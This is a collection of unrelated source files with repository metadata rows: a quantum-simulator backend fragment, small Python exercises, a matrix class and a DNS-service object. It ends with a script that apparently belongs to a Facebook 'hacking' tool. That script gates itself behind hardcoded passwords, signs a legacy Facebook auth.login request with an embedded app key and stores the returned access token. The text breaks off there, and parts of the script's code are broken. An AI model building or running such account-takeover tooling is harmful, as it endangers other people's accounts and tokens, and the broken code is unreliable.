self.is_t = options.is_t_injected if hasattr(options, 'is_t_injected') else self._options.get('is_t_injected')
self.is_reactive = options.is_reactively_separated if hasattr(options, 'is_reactively_separated') else self._options.get('is_reactively_separated')
qobj_id = options['qobj_id'] if 'qobj_id' in options else (run_input.qobj_id if hasattr(run_input, 'config') else '')
qobj_header = options['qobj_header'] if 'qobj_header' in options else (run_input.header if hasattr(run_input, 'config') else {})
job_id = str(uuid.uuid4())
job = QrackJob(self, job_id, self._run_job(job_id, run_input, data, qobj_id, qobj_header, **qrack_options), run_input)
return job
def _run_job(self, job_id, run_input, data, qobj_id, qobj_header, **options):
"""Run experiments in run_input
Args:
job_id (str): unique id for the job.
run_input (QuantumCircuit or Schedule or list): job description
Returns:
Result: Result object
"""
start = time.time()
self._data = data
experiments = run_input.experiments if hasattr(run_input, 'config') else run_input
if isinstance(experiments, QuantumCircuit):
experiments = [experiments]
results = []
for experiment in experiments:
results.append(self.run_experiment(experiment, **options))
return Result(
backend_name = self.name(),
backend_version = self._configuration.backend_version,
qobj_id = qobj_id,
job_id = job_id,
success = True,
results = results,
date = datetime.now(),
status = 'COMPLETED',
header = QrackExperimentHeader(qobj_header) if type(qobj_header) is dict else qobj_header,
time_taken = (time.time() - start)
)
def run_experiment(self, experiment, **options):
"""Run an experiment (circuit) and return a single experiment result.
Args:
experiment (QobjExperiment): experiment from qobj experiments list
Returns:
dict: A dictionary of results.
dict: A result dictionary
Raises:
QrackError: If the number of qubits is too large, or another
error occurs during execution.
"""
start = time.time()
instructions = []
if isinstance(experiment, QasmQobjExperiment):
self._number_of_qubits = experiment.header.n_qubits
self._number_of_clbits = experiment.header.memory_slots
instructions = experiment.instructions
elif isinstance(experiment, QuantumCircuit):
self._number_of_qubits = len(experiment.qubits)
self._number_of_clbits = len(experiment.clbits)
for datum in experiment._data:
qubits = []
for qubit in datum[1]:
qubits.append(experiment.qubits.index(qubit))
clbits = []
for clbit in datum[2]:
clbits.append(experiment.clbits.index(clbit))
conditional = None
condition = datum[0].condition
if condition is not None:
if isinstance(condition[0], Clbit):
conditional = experiment.clbits.index(condition[0])
else:
creg_index = experiment.cregs.index(condition[0])
size = experiment.cregs[creg_index].size
offset = 0
for i in range(creg_index):
offset += len(experiment.cregs[i])
mask = ((1 << offset) - 1) ^ ((1 << (offset + size)) - 1)
val = condition[1]
conditional = offset if (size == 1) else QrackQasmQobjInstructionConditional(mask, val)
instructions.append(QasmQobjInstruction(
datum[0].name,
qubits = qubits,
memory = clbits,
condition=condition,
conditional=conditional,
params = datum[0].params
))
else:
raise QrackError('Unrecognized "run_input" argument specified for run().')
self._sample_qubits = []
self._sample_clbits = []
self._sample_cregbits = []
self._data = []
self._sample_measure = True
shotsPerLoop = self._shots
shotLoopMax = 1
is_initializing = True
boundary_start = -1
for opcount in range(len(instructions)):
operation = instructions[opcount]
if operation.name == 'id' or operation.name == 'barrier':
continue
if is_initializing and ((operation.name == 'measure') or (operation.name == 'reset')):
continue
is_initializing = False
if (operation.name == 'measure') or (operation.name == 'reset'):
if boundary_start == -1:
boundary_start = opcount
if (boundary_start != -1) and (operation.name != 'measure'):
shotsPerLoop = 1
shotLoopMax = self._shots
self._sample_measure = False
break
preamble_memory = 0
preamble_register = 0
preamble_sim = None
if self._sample_measure or boundary_start <= 0:
boundary_start = 0
self._sample_measure = True
shotsPerLoop = self._shots
shotLoopMax = 1
else:
boundary_start -= 1
if boundary_start > 0:
self._sim = QrackSimulator(qubitCount = self._number_of_qubits, **options)
self._sim.set_t_injection(self.is_t)
self._sim.set_reactive_separate(self.is_reactive)
self._classical_memory = 0
self._classical_register = 0
for operation in instructions[:boundary_start]:
self._apply_op(operation)
preamble_memory = self._classical_memory
preamble_register = self._classical_register
preamble_sim = self._sim
for shot in range(shotLoopMax):
if preamble_sim is None:
self._sim = QrackSimulator(qubitCount = self._number_of_qubits, **options)
self._sim.set_t_injection(self.is_t)
self._sim.set_reactive_separate(self.is_reactive)
self._classical_memory = 0
self._classical_register = 0
else:
self._sim = QrackSimulator(cloneSid = preamble_sim.sid)
self._sim.set_t_injection(self.is_t)
self._sim.set_reactive_separate(self.is_reactive)
self._classical_memory = preamble_memory
self._classical_register = preamble_register
for operation in instructions[boundary_start:]:
self._apply_op(operation)
if not self._sample_measure and (len(self._sample_qubits) > 0):
self._data += [hex(int(bin(self._classical_memory)[2:], 2))]
self._sample_qubits = []
self._sample_clbits = []
self._sample_cregbits = []
if self._sample_measure and (len(self._sample_qubits) > 0):
self._data = self._add_sample_measure(self._sample_qubits, self._sample_clbits, self._shots)
data = { 'counts': dict(Counter(self._data)) }
if isinstance(experiment, QasmQobjExperiment):
data['memory'] = self._data
data = QrackExperimentResultData(**data)
else:
data = pd.DataFrame(data=data)
metadata = { 'measure_sampling': self._sample_measure }
if isinstance(experiment, QuantumCircuit) and hasattr(experiment, 'metadata') and experiment.metadata:
metadata = experiment.metadata
metadata['measure_sampling'] = self._sample_measure
return QrackExperimentResult(
shots = self._shots,
data = data,
status = 'DONE',
success = True,
header = experiment.header if isinstance(experiment, QasmQobjExperiment) else QrackExperimentResultHeader(name = experiment.name),
meta_data = metadata,
time_taken = (time.time() - start)
)
def _apply_op(self, operation):
name = operation.name
if (name == 'id') or (name == 'barrier'):
# Skip measurement logic
return
conditional = getattr(operation, 'conditional', None)
if isinstance(conditional, int):
conditional_bit_set = (self._classical_register >> conditional) & 1
if not conditional_bit_set:
return
elif conditional is not None:
mask = int(conditional.mask, 16)
if mask > 0:
value = self._classical_memory & mask
while (mask & 0x1) == 0:
mask >>= 1
value >>= 1
if value != int(conditional.val, 16):
return
if (name == 'u1') or (name == 'p'):
self._sim.u(operation.qubits[0], 0, 0, float(operation.params[0]))
elif name == 'u2':
self._sim.u(operation.qubits[0], np.pi / 2, float(operation.params[0]), float(operation.params[1]))
elif (name == 'u3') or (name == 'u'):
self._sim.u(operation.qubits[0], float(operation.params[0]), float(operation.params[1]), float(operation.params[2]))
elif name == 'r':
self._sim.u(operation.qubits[0], float(operation.params[0]), float(operation.params[1]) - np.pi/2, (-1 * float(operation.params[1])) + np.pi/2)
elif (name == 'unitary') and (len(operation.qubits) == 1):
self._sim.mtrx(operation.params[0].flatten(), operation.qubits[0])
elif name == 'rx':
self._sim.r(Pauli.PauliX, float(operation.params[0]), operation.qubits[0])
elif name == 'ry':
self._sim.r(Pauli.PauliY, float(operation.params[0]), operation.qubits[0])
elif name == 'rz':
self._sim.r(Pauli.PauliZ, float(operation.params[0]), operation.qubits[0])
elif name == 'h':
self._sim.h(operation.qubits[0])
elif name == 'x':
self._sim.x(operation.qubits[0])
elif name == 'y':
self._sim.y(operation.qubits[0])
elif name == 'z':
self._sim.z(operation.qubits[0])
elif name == 's':
self._sim.s(operation.qubits[0])
elif name == 'sdg':
self._sim.adjs(operation.qubits[0])
elif name == 'sx':
self._sim.mtrx([(1+1j)/2, (1-1j)/2, (1-1j)/2, (1+1j)/2], operation.qubits[0])
elif name == 'sxdg':
self._sim.mtrx([(1-1j)/2, (1+1j)/2, (1+1j)/2, (1-1j)/2], operation.qubits[0])
elif name == 't':
self._sim.t(operation.qubits[0])
elif name == 'tdg':
self._sim.adjt(operation.qubits[0])
elif name == 'cu1':
self._sim.mcu(operation.qubits[0:1], operation.qubits[1], 0, 0, float(operation.params[0]))
elif name == 'cu2':
self._sim.mcu(operation.qubits[0:1], operation.qubits[1], np.pi / 2, float(operation.params[0]), float(operation.params[1]))
elif (name == 'cu3') or (name == 'cu'):
self._sim.mcu(operation.qubits[0:1], operation.qubits[1], float(operation.params[0]), float(operation.params[1]), float(operation.params[2]))
elif name == 'cx':
self._sim.mcx(operation.qubits[0:1], operation.qubits[1])
elif name == 'cy':
self._sim.mcy(operation.qubits[0:1], operation.qubits[1])
elif name == 'cz':
self._sim.mcz(operation.qubits[0:1], operation.qubits[1])
elif name == 'ch':
self._sim.mch(operation.qubits[0:1], operation.qubits[1])
elif name == 'cp':
self._sim.mcmtrx(operation.qubits[0:1], [1, 0, 0, np.exp(1j * float(operation.params[0]))], operation.qubits[1])
elif name == 'csx':
self._sim.mcmtrx(operation.qubits[0:1], [(1+1j)/2, (1-1j)/2, (1-1j)/2, (1+1j)/2], operation.qubits[1])
elif name == 'csxdg':
self._sim.mcmtrx(operation.qubits[0:1], [(1-1j)/2, (1+1j)/2, (1+1j)/2, (1-1j)/2], operation.qubits[1])
elif name == 'dcx':
self._sim.mcx(operation.qubits[0:1], operation.qubits[1])
self._sim.mcx(operation.qubits[1:2], operation.qubits[0])
elif name == 'ccx':
self._sim.mcx(operation.qubits[0:2], operation.qubits[2])
elif name == 'ccy':
self._sim.mcy(operation.qubits[0:2], operation.qubits[2])
elif name == 'ccz':
self._sim.mcz(operation.qubits[0:2], operation.qubits[2])
elif name == 'mcx':
self._sim.mcx(operation.qubits[0:-1], operation.qubits[-1])
elif name == 'mcy':
self._sim.mcy(operation.qubits[0:-1], operation.qubits[-1])
elif name == 'mcz':
self._sim.mcz(operation.qubits[0:-1], operation.qubits[-1])
elif name == 'swap':
self._sim.swap(operation.qubits[0], operation.qubits[1])
elif name == 'iswap':
self._sim.iswap(operation.qubits[0], operation.qubits[1])
elif name == 'cswap':
self._sim.cswap(operation.qubits[0:1], operation.qubits[1], operation.qubits[2])
elif name == 'mcswap':
self._sim.cswap(operation.qubits[:-2], operation.qubits[-2], operation.qubits[-1])
elif name == 'reset':
qubits = operation.qubits
for qubit in qubits:
if self._sim.m(qubit):
self._sim.x(qubit)
elif name == 'measure':
qubits = operation.qubits
clbits = operation.memory
cregbits = operation.register if hasattr(operation, 'register') else len(operation.qubits) * [-1]
self._sample_qubits += qubits
self._sample_clbits += clbits
self._sample_cregbits += cregbits
if not self._sample_measure:
for index in range(len(qubits)):
qubit_outcome = self._sim.m(qubits[index])
clbit = clbits[index]
clmask = 1 << clbit
self._classical_memory = (self._classical_memory & (~clmask)) | (qubit_outcome << clbit)
cregbit = cregbits[index]
if cregbit < 0:
cregbit = clbit
regbit = 1 << cregbit
self._classical_register = (self._classical_register & (~regbit)) | (qubit_outcome << cregbit)
elif name == 'bfunc':
mask = int(operation.mask, 16)
relation = operation.relation
val = int(operation.val, 16)
cregbit = operation.register
cmembit = operation.memory if hasattr(operation, 'memory') else None
compared = (self._classical_register & mask) - val
if relation == '==':
outcome = (compared == 0)
elif relation == '!=':
outcome = (compared != 0)
elif relation == '<':
outcome = (compared < 0)
elif relation == '<=':
outcome = (compared <= 0)
elif relation == '>':
outcome = (compared > 0)
elif relation == '>=':
outcome = (compared >= 0)
else:
raise QrackError('Invalid boolean function relation.')
# Store outcome in register and optionally memory slot
regbit = 1 << cregbit
self._classical_register = \
(self._classical_register & (~regbit)) | (int(outcome) << cregbit)
if cmembit is not None:
membit = 1 << cmembit
self._classical_memory = \
(self._classical_memory & (~membit)) | (int(outcome) << cmembit)
else:
backend = self.name()
err_msg = '{0} encountered unrecognized operation "{1}"'
raise QrackError(err_msg.format(backend, operation))
def _add_sample_measure(self, sample_qubits, sample_clbits, num_samples):
"""Generate data samples from current statevector.
Taken almost straight from the terra source code.
Args:
measure_params (list): List of (qubit, clbit) values for
measure instructions to sample.
num_samples (int): The number of data samples to generate.
Returns:
list: A list of data values in hex format.
"""
# Get unique qubits that are actually measured
measure_qubit = [qubit for qubit in sample_qubits]
measure_clbit = [clbit for clbit in sample_clbits]
# Sample and convert to bit-strings
data = []
if num_samples == 1:
sample = self._sim.m_all()
result = 0
for index in range(len(measure_qubit)):
qubit = measure_qubit[index]
qubit_outcome = ((sample >> qubit) & 1)
result |= qubit_outcome << index
measure_results = [result]
else:
measure_results = self._sim.measure_shots(measure_qubit, num_samples)
for sample in measure_results:
for index in range(len(measure_qubit)):
qubit_outcome = ((sample >> index) & 1)
clbit = measure_clbit[index]
clmask = 1 << clbit
self._classical_memory = (self._classical_memory & (~clmask)) | (qubit_outcome << clbit)
data.append(hex(int(bin(self._classical_memory)[2:], 2)))
return data
@staticmethod
def name():
return 'qasm_simulator'
|
[
"stranoj@gmail.com"
] |
stranoj@gmail.com
|
b78c3c5f2faad82ecfe45b65041406cf264ae80e
|
5a9d8c64c6478f3816b63f59f1cdaca73c0848eb
|
/pythonNet/ex07_Thread/thread_lock.py
|
b687422687b6cca1365840560f6693dda88bc5b3
|
[] |
no_license
|
wangredfei/nt_py
|
f68134977e6d1e05cf17cec727644509f084c462
|
fedf03c0d52565f588e9b342d1c51df0b6dc2681
|
refs/heads/master
| 2020-04-08T07:55:08.302589
| 2018-11-23T09:53:48
| 2018-11-23T09:53:48
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 288
|
py
|
from threading import Thread,Lock
a = b = 0
lock = Lock()
def fun():
while True:
lock.acquire()
if a != b:
print("a=%d,b=%d"%(a,b))
lock.release()
t = Thread(target=fun)
t.start()
while True:
with lock:
a += 1
b += 1
t.join()
|
[
"289498360@qq.com"
] |
289498360@qq.com
|
a875518df17d09ffcfcba9970868520e03dcd877
|
3a73374a708037368f587ba6379ec2fd0b48851a
|
/array/product_array.py
|
719eef575d612a9c2963fb90dc4b510d789a6f0d
|
[] |
no_license
|
swatia-code/data_structure_and_algorithm
|
948d3b39d649d5bd6e3aabaefedbcd09098906d2
|
7219ff9c5a5b0c565b3f17095775d902a92e3d83
|
refs/heads/master
| 2023-03-30T08:49:48.350623
| 2021-04-02T08:44:30
| 2021-04-02T08:44:30
| 254,819,280
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,433
|
py
|
"""
PROBLEM STATEMENT
-----------------
Given an array arr[] of n integers, construct a Product Array prod[] (of same size) such that prod[i] is equal to the
product of all the elements of arr[] except arr[i]. Solve it without division operator in O(n) time.
Example :
Input: arr[] = {10, 3, 5, 6, 2}
Output: prod[] = {180, 600, 360, 300, 900}
3 * 5 * 6 * 2 product of other array
elements except 10 is 180
10 * 5 * 6 * 2 product of other array
elements except 3 is 600
10 * 3 * 6 * 2 product of other array
elements except 5 is 360
10 * 3 * 5 * 2 product of other array
elements except 6 is 300
10 * 3 * 6 * 5 product of other array
elements except 2 is 900
Input: arr[] = {1, 2, 3, 4, 5}
Output: prod[] = {120, 60, 40, 30, 24 }
2 * 3 * 4 * 5 product of other array
elements except 1 is 120
1 * 3 * 4 * 5 product of other array
elements except 2 is 60
1 * 2 * 4 * 5 product of other array
elements except 3 is 40
1 * 2 * 3 * 5 product of other array
elements except 4 is 30
1 * 2 * 3 * 4 product of other array
elements except 5 is 24
TIME COMPLEXITY
----------------
O(N)
CODE
----
"""
def productExceptSelf(arr, n):
#code here
val = [1 for _ in range(n)]
temp = 1
for i in range(n):
val[i] = temp
temp = temp * arr[i]
temp = 1
for i in range(n - 1, -1, -1):
val[i] = val[i] * temp
temp = temp * arr[i]
return val
|
[
"noreply@github.com"
] |
swatia-code.noreply@github.com
|
da7ab4476cc7860aa2dc1bb9fe4ba9d91471885e
|
750b511104b85fa3ba923c00f2857e028800cb26
|
/task14.py
|
3d33dcc58ecce65615eb3037a1a98cf380ed00d0
|
[] |
no_license
|
noozip2241993/basic-python
|
85b8aaa6689d1ec940ebf5268e3cff91525685c6
|
a10fc3a72446cd13ae9cf4efe52d68423c514b3c
|
refs/heads/master
| 2023-02-07T06:03:32.128940
| 2021-01-01T23:41:48
| 2021-01-01T23:41:48
| 326,075,092
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 146
|
py
|
def calculate_number_of_days(y=1,m=1,d=1):
return d
days =calculate_number_of_days(2014,7,11) - calculate_number_of_days(2014,7,2)
print(days)
|
[
"khang.nguyen@student.csulb.edu"
] |
khang.nguyen@student.csulb.edu
|
82534abd8c0f2fc0874087dedea8f407ef9ed51f
|
f6ac57ca8023f51daa43ff35f7cfb6521f747575
|
/tests/test_conn.py
|
eacd2a12b70351f8751c47271a88f74eadf9a9cf
|
[] |
no_license
|
Thomas95i/cours_insta
|
879a36a5255b3e51ae8dc657d34951f71a5100aa
|
16454e3acc40076d1a4103ea533e891094c61fec
|
refs/heads/master
| 2022-12-18T09:02:05.181296
| 2020-02-21T15:03:11
| 2020-02-21T15:03:11
| 241,927,710
| 0
| 0
| null | 2022-12-08T03:42:27
| 2020-02-20T16:05:27
|
Python
|
UTF-8
|
Python
| false
| false
| 69
|
py
|
def test_conn(client):
assert client.get('/').status_code == 200
|
[
"tom_barbot@hotmail.fr"
] |
tom_barbot@hotmail.fr
|
83c2d0827eddf2bf025f32a2e000ac311cbef558
|
afb651a874076b7034cd448b40bceb91c0bc10d1
|
/oculoenv/geom.py
|
a864bab652a3e19152db4cfba9af14a2d866a49b
|
[
"MIT",
"Apache-2.0"
] |
permissive
|
wbap/oculoenv
|
38bab908cf7d1b45d71249e6b8ab35008fe3c642
|
a8e25b41bcfaa7454c9ba9326f08eb3519456770
|
refs/heads/master
| 2023-03-18T01:18:13.169124
| 2023-03-12T00:52:32
| 2023-03-12T00:52:32
| 139,673,527
| 6
| 10
|
Apache-2.0
| 2023-03-12T00:52:33
| 2018-07-04T05:42:14
|
Python
|
UTF-8
|
Python
| false
| false
| 3,313
|
py
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
import numpy as np
class Matrix4(object):
def __init__(self, m=None):
# numpy ndarray stores values in row major order
if m is None:
self.m = np.identity(4, dtype=np.float32)
else:
self.m = m
def set_trans(self, v):
""" Set translation element of the matrix.
Arguments:
v: Float array, element size should be 3 or 4.
if the size is 4, the fourth value should be 1.0
"""
for i in range(len(v)):
self.m[i, 3] = v[i]
def transform(self, v):
""" Set translation element of the matrix.
Arguments:
v: Float array, element size should be 3 or 4.
if the size is 4, the fourth value should be 1.0
Returns:
Float array of length 4. A transformed vector.
"""
if len(v) == 3:
v = (v + [1.0])
return self.m.dot(v)
def set_rot_x(self, angle):
""" Set matrix with rotation around x axis.
Arguments:
angle: Float, (radian) angle
"""
s = math.sin(angle)
c = math.cos(angle)
mv = [[1.0, 0.0, 0.0, 0.0],
[0.0, c, -s, 0.0],
[0.0, s, c, 0.0],
[0.0, 0.0, 0.0, 1.0]]
self.m = np.array(mv, dtype=np.float32)
def set_rot_y(self, angle):
""" Set matrix with rotation around y axis.
Arguments:
angle: Float, (radian) angle
"""
s = math.sin(angle)
c = math.cos(angle)
mv = [[ c, 0.0, s, 0.0],
[0.0, 1.0, 0.0, 0.0],
[ -s, 0.0, c, 0.0],
[0.0, 0.0, 0.0, 1.0]]
self.m = np.array(mv, dtype=np.float32)
def set_rot_z(self, angle):
""" Set matrix with rotation around y axis.
Arguments:
angle: Float, (radian) angle
"""
s = math.sin(angle)
c = math.cos(angle)
mv = [[ c, -s, 0.0, 0.0],
[ s, c, 0.0, 0.0],
[0.0, 0.0, 1.0, 0.0],
[0.0, 0.0, 0.0, 1.0]]
self.m = np.array(mv, dtype=np.float32)
def get_axis(self, axis_index):
""" Get specified axis of this matrix.
Arguments:
axis: Integer, index of axis
Returns:
Numpy float ndarray: length 3
"""
v = []
for i in range(3):
v.append(self.m[i, axis_index])
return np.array(v)
def invert(self):
""" Returns inverted matrix.
Returns:
Matrix4, inverted matrix
"""
m_inv = self.m
m_inv = np.linalg.inv(self.m)
mat = Matrix4()
mat.m = m_inv
return mat
def mul(self, mat):
""" Returns multiplied matrix.
Returns:
Matrix4, multipied matrix
"""
m_mul = self.m.dot(mat.m)
mat = Matrix4()
mat.m = m_mul
return mat
def get_raw_gl(self):
""" Returns OpenGL compatible (column major) array representation of the matrix.
Returns:
Float array
"""
m_ret = np.transpose(self.m)
return m_ret.reshape([16])
|
[
"miyoshi@narr.jp"
] |
miyoshi@narr.jp
|
7bc66b3bb4047b08d2b5347d0379f37a95407091
|
a58fcf9467749de7d269c5b17430773069e29791
|
/designate/objects/service_status.py
|
e86ecd0908900c849ea30b5ff0c75a61ffe20377
|
[
"Apache-2.0"
] |
permissive
|
Woody89/designate-private
|
586df6c28a2da573663487e4728c3fddfef095af
|
0a6ed5a1d7cdac5cb1e9dec8fd3ddfb9a77c58f5
|
refs/heads/master
| 2021-01-22T19:22:49.391876
| 2017-08-19T06:16:53
| 2017-08-19T06:16:53
| 100,774,211
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,716
|
py
|
# Copyright 2016 Hewlett Packard Enterprise Development Company LP
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from designate.objects import base
class ServiceStatus(base.PersistentObjectMixin,
base.DictObjectMixin,
base.DesignateObject):
FIELDS = {
"service_name": {
"schema": {
"type": "string"
}
},
"hostname": {
"schema": {
"type": "string"
}
},
"heartbeated_at": {
"schema": {
'type': ['string', 'null'],
'format': 'date-time'
}
},
"status": {
"schema": {
"type": "string",
"enum": ["UP", "DOWN", "WARNING"]
}
},
"stats": {
"schema": {
"type": "object",
}
},
"capabilities": {
"schema": {
"type": "object"
}
}
}
STRING_KEYS = [
'service_name', 'hostname', 'status'
]
class ServiceStatusList(base.ListObjectMixin, base.DesignateObject):
LIST_ITEM_TYPE = ServiceStatus
|
[
"dongpzh@adtec.com.cn"
] |
dongpzh@adtec.com.cn
|
2e67ac32d4cd4f6c74bcb5822f168309c0f01a60
|
c1059f94ad075bdc646e1f28dd749574e2c21fc2
|
/Sohag.py
|
e8e0f468f2f72892cf1976cca6ae0a06bd89573e
|
[] |
no_license
|
Sohagblacktiger786/loveHackerSoHag333
|
d143402f0da1e2040f172ec45eaa80a7ec14a46f
|
62dec149b7b495a60517082d932476cef2795f2b
|
refs/heads/master
| 2022-10-01T14:54:17.574609
| 2020-05-27T06:00:24
| 2020-05-27T06:00:24
| 267,233,331
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 20,801
|
py
|
#!/usr/bin/python2
#coding=utf-8
#The Credit For This Code Goes To lovehacker
#If You Wanna Take Credits For This Code, Please Look Yourself Again...
#Reserved2020
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print "\x1b[1;91mExit"
os.sys.exit()
def acak(b):
w = 'ahtdzjc'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(b):
w = 'ahtdzjc'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
sys.stdout.write(x+'\n')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.07)
#Dev:love_hacker
##### LOGO #####
logo = """
\033[1;91m:▒▒▒▒███▒███▒███▒███▒▒▒▒▒▒▒▒▒▒:
\033[1;92m▒▒▒▒▒▒▒▒█▒█▒█▒▒▒█▒█▒█▒▒▒▒▒▒▒▒▒▒::
\033[1;93m:▒▒▒▒▒▒███▒█▒█▒███▒█▒█▒▒▒▒▒▒▒▒▒▒:::
\033[1;94m::▒▒▒▒▒▒█▒▒▒█▒█▒█▒▒▒█▒█▒▒▒▒▒▒▒▒▒▒::::
\033[1;95m:::▒▒▒▒▒▒███▒███▒███▒███▒▒▒▒▒▒▒▒▒▒:::::
\033[1;96m::♧♧♧♧♧♧♧♧♧♧\033[1;91mWhatsapp\033[1;96m♧♧♧♧♧♧♧♧♧♧▒▒▒▒▒▒▒::::
\033[1;91m:》》》\033[1;93m+8801755974285\033[1;91m《《《▒▒▒▒▒▒▒▒▒▒▒:::::
\033[1;95m♡╭──────────•◈•──────────╮♡\033[1;96m-N S SoHag Chowdhury -\033[1;95m♡╭──────────•◈•──────────╮♡
\033[1;92m..........................BlackMafia......................
\033[1;93m╔╗ ╔╗╔═╦╦╦═╗ ╔╗╔╦═╦╦╗
\033[1;93m║║ ║╚╣║║║║╩╣ ╚╗╔╣║║║║ Bangladesh
\033[1;93m╚╝ ╚═╩═╩═╩═╝═ ╚╝╚═╩═╝
\033[1;95m♡╰──────────•◈•──────────╯♡\033[1;96mBlackMafia\033[1;95m♡╰──────────•◈•──────────╯♡"""
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\x1b[1;93mPlease Wait \x1b[1;93m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
berhasil = []
cekpoint = []
oks = []
id = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
os.system("clear")
print """
\033[1;96m-┈┈┈┈┈┈┈┈┈┈┈╱▔▔▔▔╲┈┈┈┈┈┈┈┈
\033[1;96m┈┈┈┈┈┈┈┈┈┈┈▕▕╲┊┊╱▏▏┈┈┈┈┈┈┈
\033[1;96m┈┈┈┈┈┈┈┈┈┈┈▕▕▂╱╲▂▏▏┈┈┈┈┈┈┈
\033[1;96m ┈┈┈┈┈┈┈┈┈┈┈┈╲┊┊┊┊╱┈┈┈┈┈┈┈┈
\033[1;96m ┈┈┈┈┈┈┈┈┈┈┈┈▕╲▂▂╱▏┈┈┈┈┈┈┈┈
\033[1;96m ┈┈┈┈┈┈┈┈╱▔▔▔▔┊┊┊┊▔▔▔▔╲┈┈┈┈
\033[1;96m ─────────────•◈•──────────
\033[1;92m███████▒▒Welcome To N S SoHag Chowdhury ▒▒████████
\033[1;95m♡╭──────────•◈•──────────╮♡\033[1;96mBlackMafia\033[1;95m♡╭──────────•◈•──────────╮♡
\033[1;94mAuthor\033[1;91m: \033[1;91N S SoHag Chowdhury
\033[1;94mBlackMafia\033[1;91m: \033[1;91▒▓██████████████]99.9
\033[1;94mFacebook\033[1;91m: \033[1;91mlovehacker
\033[1;94mWhatsAppNum\033[1;91m: \033[1;91m+8801755974285
\033[1;95m♡╰──────────•◈•──────────╯♡\033[1;96mBlackMafia\033[1;95m♡╰──────────•◈•──────────╯♡"""
jalan(' \033[1;96m....................BlackMafiaSoHag.....................:')
jalan("\033[1;93m ┈┈┈┈┈┈┈┈╱▔▔▔▔╲┈┈┈┈┈┈┈┈ ")
jalan('\033[1;93m ┈┈┈┈┈┈┈▕▕╲┊┊╱▏▏┈┈┈┈┈┈┈ ')
jalan('\033[1;93m ┈┈┈┈┈┈┈▕▕▂╱╲▂▏▏┈┈┈┈┈┈┈ ')
jalan("\033[1;93m ┈┈┈┈┈┈┈┈╲┊┊┊┊╱┈┈┈┈┈┈┈┈ ")
jalan("\033[1;93m ┈┈┈┈┈┈┈┈▕╲▂▂╱▏┈┈┈┈┈┈┈┈")
print "\033[1;93m♡─────╱▔▔▔▔┊┊┊┊▔▔▔▔╲───────♡\033[1;96mLogin BlackMafia\033[1;95m♡╰──────────•◈•──────────╯♡"
CorrectUsername = "sohag"
CorrectPassword = "lovehackersohag"
loop = 'true'
while (loop == 'true'):
username = raw_input("\033[1;91m🔐 \x1b[1;91mTool Username \x1b[1;91m»» \x1b[1;93m")
if (username == CorrectUsername):
password = raw_input("\033[1;94m🔐 \x1b[1;91mTool Password \x1b[1;91m»» \x1b[1;92m")
if (password == CorrectPassword):
print "Logged in successfully as " + username #Dev:love_hacker
time.sleep(2)
loop = 'false'
else:
print "\033[1;91mWrong Password"
os.system('xdg-open https://m.youtube.com/channel/UCuIBFtcJZCnGEPw5XH7DQSg')
else:
print "\033[1;94mWrong Username"
os.system('xdg-open https://m.youtube.com/channel/UCuIBFtcJZCnGEPw5XH7DQSg')
def login():
os.system('clear')
try:
toket = open('login.txt','r')
menu()
except (KeyError,IOError):
os.system('clear')
print logo
jalan(' \033[1;92mWarning: \033[1;97mDo Not Use Your Personal Account' )
jalan(' \033[1;92m Note: \033[1;97mUse a New Account To Login' )
print "\033[1;95m♡──────────•◈•──────────♡\033[1;96mBlackMafia\033[1;95m♡──────────•◈•──────────♡"
print(' \033[1;94m♡\x1b[1;91m》》》》》》LOGIN WITH FACEBOOK《《《《《《\x1b[1;94m♡' )
print(' ' )
id = raw_input('\033[1;96m[+] \x1b[1;92mID/Email\x1b[1;95m: \x1b[1;96m')
pwd = raw_input('\033[1;96m[+] \x1b[1;93mPassword\x1b[1;96m: \x1b[1;96m')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print"\n\x1b[1;96mThere is no internet connection"
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"}
x=hashlib.new("md5")
x.update(sig)
a=x.hexdigest()
data.update({'sig':a})
url = "https://api.facebook.com/restserver.php"
r=requests.get(url,params=data)
z=json.loads(r.text)
unikers = open("login.txt", 'w')
unikers.write(z['access_token'])
unikers.close()
print '\n\x1b[1;95mLogin Successful...'
